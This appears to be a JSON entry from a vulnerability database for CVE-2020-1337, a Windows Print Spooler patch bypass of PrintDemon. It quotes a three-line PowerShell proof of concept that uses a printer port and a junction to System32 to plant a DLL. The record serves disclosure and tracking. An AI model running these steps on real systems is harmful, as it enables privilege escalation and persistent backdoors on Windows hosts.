{"uuid": "c374bfdd-c16b-4327-831c-c7d256433d38", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "CVE-2020-1337", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/1571", "content": "CVE-2020-1337 is CVE-2020-1048 (aka PrintDemon)\nwith a bypass of PrintDemon\u2019s recent patch via a Junction Directory (TOCTOU)\nPoC:\nmkdir C:\\test\nAdd-PrinterPort -Name c:\\test\\ualapi.dll\nNew-Item -Type Junction -Path C:\\test -Value C:\\Windows\\System32\n1. https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/\n2. https://www.zerodayinitiative.com/blog/2020/8/11/windows-print-spooler-patch-bypass-re-enables-persistent-backdoor", "creation_timestamp": "2020-08-12T11:03:01.000000Z"}